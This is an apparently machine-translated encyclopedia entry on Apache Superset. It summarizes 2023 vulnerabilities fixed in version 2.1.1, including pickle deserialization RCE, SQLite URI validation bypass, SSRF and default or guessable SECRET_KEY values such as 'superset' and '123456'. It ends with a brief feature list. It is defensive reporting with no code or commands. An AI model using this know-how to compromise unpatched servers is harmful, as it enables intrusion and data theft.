Apache Superset

Apache Superset -. open source BI platform

2023: Loss of access and data awaits users of older versions of Apache SuperSet

Apache has released updates that close two vulnerabilities in the SuperSet analytical platform. Exploitation of these vulnerabilities (CVE-2023-39265 and CVE-2023-37941) allows an attacker to gain remote access and control over the system. This became known on September 7, 2023.

The upgrade to version 2.1.1 also fixes a separate issue with incorrect access rights to the REST API (CVE-2023-36388), which allowed users with low privileges to conduct SSRF attacks.

According to experts safety from Horizon3, the SuperSet platform was originally designed to provide privileged users with access to arbitrary databases and the ability to perform SQL requests. If the attacker manages to connect to the metadata of the SuperSet itself, he will be able to access the configuration and credentials, to data as well as execute arbitrary code.

The vulnerability is CVE-2023-39265 related to bypassing URI validation when connecting to, metadata database SQLite which allows arbitrary data operations. Also associated with this vulnerability is the lack of verification when importing information about a connection to SQLite from, file which can be used by attackers to import harmful files.

CVE-2023-37941 allows you to inject an arbitrary payload into the metadata store and execute it remotely. This vulnerability is related to the use of the pickle library to serialize data. An attacker who gains access to a record in the metadata database can inject malicious code that will be deserialized and executed on the server.

Other flaws fixed in the latest version of SuperSet include:

• a vulnerability for reading arbitrary MySQL files, which can be used to obtain credentials from the database;
• abusing the load_examples command to obtain the metadata database URI from the user interface and modify the data stored therein;
• using default credentials to access the metadata database in some SuperSet configurations;
• leakage of credentials in plaintext when requesting the API "/api/v1/database "on behalf of a privileged user.

Experts recommend generating "SECRET_KEY" for each SuperSet configuration rather than using default values. This will avoid compromising the system by attackers.

According to Horizon3, more than 2,000 of the roughly 4,000 open SuperSet servers still use default keys. About 70 systems have guessable keys like "superset" or "123456."

Experts believe that the root of many problems lies in the fact that the SuperSet web interface initially allows you to connect to the metadata database. This opens up opportunities for attacks, allowing you to manipulate configuration and data.

The developers promise to further restrict access to metadata and implement automatic key generation. Users are strongly encouraged to install the latest updates and verify system security settings.

Vulnerabilities in Open Source solutions such as SuperSet can pose serious security risks to organizations. Experts urge to monitor the release of updates and install them in a timely manner. It is also important to correctly configure the system and not use the default credentials and keys ^[1]

2021: Apache Superset features

Among the features of Apache Superset for June 2021:

• Open Scalable Architecture
• BI Platform/Data Management Platform Bundle
• Multiple DBMSs for different tasks
• No License Fees
• Possibility of rework

Notes